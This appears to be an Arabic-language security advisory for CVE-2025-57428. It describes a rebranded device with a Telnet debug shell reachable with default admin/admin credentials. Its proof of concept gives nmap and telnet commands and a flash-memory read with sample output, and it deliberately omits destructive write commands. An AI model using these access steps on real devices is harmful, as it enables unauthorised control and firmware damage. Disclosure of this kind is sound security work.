
CVE-2025-57428
⚠️ هذا المستودع يُحتفظ به فقط كمرجع لـ CVE-2025-57428.
للحصول على النشرات والتحديثات الأخرى، يرجى الرجوع إلى: security-advisories.
يعرض هذا الجهاز واجهة تصحيح Telnet (مفعلة افتراضيًا على المنفذ 23) ويقبل بيانات اعتماد المسؤول (`admin`/`admin` افتراضيًا). بعد المصادقة، توفر القشرة وصولًا مباشرًا إلى أوامر منخفضة المستوى (خصوصًا `spi` و `reg`)، مما قد يؤدي إلى تلف عشوائي للبرامج الثابتة، وتعطيل الجهاز، وفقدان الوظائف أو التكوين الأمني.
ملاحظة: لقد حذفت عمدًا الأوامر التي تقوم بكتابة مدمرة. يُؤكد إثبات المفهوم أدناه وجود الواجهة وإمكانية الوصول إليها دون تقديم استغلال جاهز.
امسح الجهاز على الشبكة المحلية:
nmap -p 23 <device-ip>
النتيجة: المنفذ 23 (telnet) يظهر open.
اتصل عبر Telnet وقم بالمصادقة (بيانات الاعتماد الافتراضية):
telnet <device-ip>
# Login as: admin
# Password: admin
بعد تسجيل الدخول، تظهر موجه تصحيح CMD>.
اسرد الأوامر المتاحة:
CMD>help
يظهر مخرج التعليمات القوائم التالية:
cfg net os
ادخل إلى قائمة os:
CMD>os
اسرد الأوامر المتاحة مرة أخرى:
OS>help
هذه المرة يظهر مخرج التعليمات الأوامر التالية:
thread mem spi reg cpuload cpubusy event
استخدام spi يظهر spi <rd/wr/er> <addr> [len].
اقرأ ذاكرة الفلاش:
OS>spi rd 0x000fd0f0 16
يعيد هذا تفريغًا سداسيًا للمنطقة:
4f30650a 938f56fa 1b663a19 e316d824
يؤكد هذا أن الأمر يعمل وأن القشرة تمتلك وصولًا منخفض المستوى.
أمر الكتابة (spi wr) وأمر المسح (spi er)، بالإضافة إلى أوامر reg، قابلة للتنفيذ أيضًا.
ملاحظات:
فشلت محاولات العثور على أي جهة اتصال أمنية أو قناة دعم من البائع الأصلي. يبدو أن المنتج عبارة عن جهاز معاد تسميته من مصدر غير معروف.
يتم توفير هذه المعلومات للأغراض التعليمية والدفاعية فقط. لا يتحمل المؤلف أي مسؤولية عن أي إساءة استخدام لهذه المعلومات.